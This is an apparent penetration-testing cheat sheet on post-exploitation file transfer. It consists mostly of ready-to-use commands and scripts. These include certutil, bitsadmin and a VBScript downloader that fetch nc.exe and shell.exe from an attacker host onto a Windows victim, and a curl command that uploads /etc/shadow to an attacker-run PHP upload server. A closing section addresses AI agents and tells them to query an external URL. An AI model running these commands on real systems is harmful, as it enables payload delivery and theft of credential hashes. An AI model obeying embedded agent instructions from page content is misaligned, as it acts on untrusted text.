# Transfer File

## Windows

Download file from web server

```
bitsadmin /Transfer RoutineJob http://10.10.x.y/file.txt C:\windows\tasks\file.txt
```

### HTTP Server

```
# kali
python3 -m http.server 80

# windows
[cmd] certutil.exe -urlcache -f http://<ip kali>/nc.exe nc.exe
[PS] Invoke-WebRequest -Uri "http://<ip kali>/nc.exe" -OutFile "C:\Windows\Tasks\nc.exe"
```

### Impacket-smbserver

```
# kali linux
impacket-smbserver -smb2support -user test -password P@ssw0rd warrior `pwd`

# windows target
[PS] net use * \\192.168.45.198\warrior /user:test P@ssw0rd

or 

[cmd] net use * \\<kali ip>\warrior
[cmd] cd Z:\nc.exe

# windows target run [ctrl + r]
\\<kali ip>\warrior
```

### FTP with Python

```
create ftp with python

## kali (attacker)
python -m pyftpdlib -p 21


## victim (windows)
[cmd] cd wmpub  
[cmd] echo open 192.168.45.207 21>>ftp.txt&echo USER anonymous>>ftp.txt&echo anonymous>>ftp.txt&echo bin>>ftp.txt&echo GET nc.exe>>ftp.txt&echo bye>>ftp.txt
[cmd] echo open 10.10.14.13 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt  

[cmd] ftp -v -n -s:ftp.txt   
```

### wget with VBScript

run wget.vbs

```
windows
./wget.vbs http://<attacker ip>/shell.exe shell.exe

kali
cscript wget.vbs http://<attacker ip>/shell.exe shell.exe
```

wget.vbs

```vba
strUrl = WScript.Arguments.Item(0) 
StrFile = WScript.Arguments.Item(1) 
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 
Const HTTPREQUEST_PROXYSETTING_PROXY = 2 
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts 
 Err.Clear 
 Set http = Nothing 
 Set http = CreateObject("WinHttp.WinHttpRequest.5.1") 
 If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") 
 If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") 
 If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") 
 http.Open "GET", strURL, False 
 http.Send 
 varByteArray = http.ResponseBody 
 Set http = Nothing 
 Set fs = CreateObject("Scripting.FileSystemObject") 
 Set ts = fs.CreateTextFile(StrFile, True) 
 strData = "" 
 strBuffer = "" 
 For lngCounter = 0 to UBound(varByteArray) 
 ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) 
 Next 
 ts.Close 
```

Non-Interactive command:

```batch
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo  Err.Clear >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo  http.Open "GET", strURL, False >> wget.vbs
echo  http.Send >> wget.vbs
echo  varByteArray = http.ResponseBody >> wget.vbs
echo  Set http = Nothing >> wget.vbs
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo  strData = "" >> wget.vbs
echo  strBuffer = "" >> wget.vbs
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo  Next >> wget.vbs
echo  ts.Close >> wget.vbs
```

## Linux

### netcat

```
#On the receiving end running,
nc -l -p 1234 > out.file 
# will begin listening on port 1234.

# On the sending end running,
nc -w 3 [destination] 1234 < out.file  
```

### Upload.php

**Attacker Machine:**

setup the php web server

/var/www/html/**upload.php**

```php
<?php
$target_path = "uploads/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
echo "Source=" . $_FILES['uploadedfile']['name'] . "<br />";
echo "Target path=" . $target_path . "<br />";
echo "Size=" . $_FILES['uploadedfile']['size'] . "<br />";
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file " . basename( $_FILES['uploadedfile']['name']) . " has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
?>
```

Power up the apache server

```
systemctl start apache2
```

**Victim:**

```bash
curl --form "uploadedfile=@/etc/shadow" http://<attacker ip>/upload.php
```

### Python Simple Upload HTTP Server

run this in attacker machine, use for downloading the file and uploading the file from victim machine.

```python
import cgi
import http.server
import socketserver
import os
from pathlib import Path

PORT = 8080
UPLOAD_DIRECTORY = "./uploaded"

class UploadHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/':
            self.send_response(200)
            self.send_header('Content-Type', 'text/html')
            self.end_headers()

            file_list_html = "<ul>"
            for filename in os.listdir(UPLOAD_DIRECTORY):
                file_list_html += f"<li><a href='/{UPLOAD_DIRECTORY}/{filename}'>{filename}</a></li>"
            file_list_html += "</ul>"

            self.wfile.write(f'''<!DOCTYPE html>
            <html>
            <head>
                <title>Files List</title>
            </head>
            <body>
                <h1>Files:</h1>
                {file_list_html}
                <form action="/upload" method="post" enctype="multipart/form-data">
                    Select file to upload: <input type="file" name="file" id="file">
                    <input type="submit" value="Upload" name="submit">
                </form>
            </body>
            </html>'''.encode())
        else:
            super().do_GET()

    def do_POST(self):
        if self.path == '/upload':
            form = cgi.FieldStorage(
                fp=self.rfile,
                headers=self.headers,
                environ={'REQUEST_METHOD': 'POST'}
            )
            file_item = form['file']

            if file_item.filename:
                file_path = Path(file_item.filename)
                upload_path = Path(UPLOAD_DIRECTORY) / file_path.name
                with open(upload_path, 'wb') as file:
                    file.write(file_item.file.read())
                self.send_response(303)  # Redirect with "See Other"
                self.send_header('Location', '/')  # Redirect to root directory
                self.end_headers()
            else:
                self.send_response(400)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                self.wfile.write(b'<h1>No file was uploaded</h1>')

        else:
            super().do_POST()

if __name__ == "__main__":
    if not os.path.exists(UPLOAD_DIRECTORY):
        os.makedirs(UPLOAD_DIRECTORY)

    with socketserver.TCPServer(("", PORT), UploadHandler) as httpd:
        print(f"Serving at http://localhost:{PORT}")
        httpd.serve_forever()


```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacker-mind.gitbook.io/hacker-mind/post-exploit/transfer-file.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.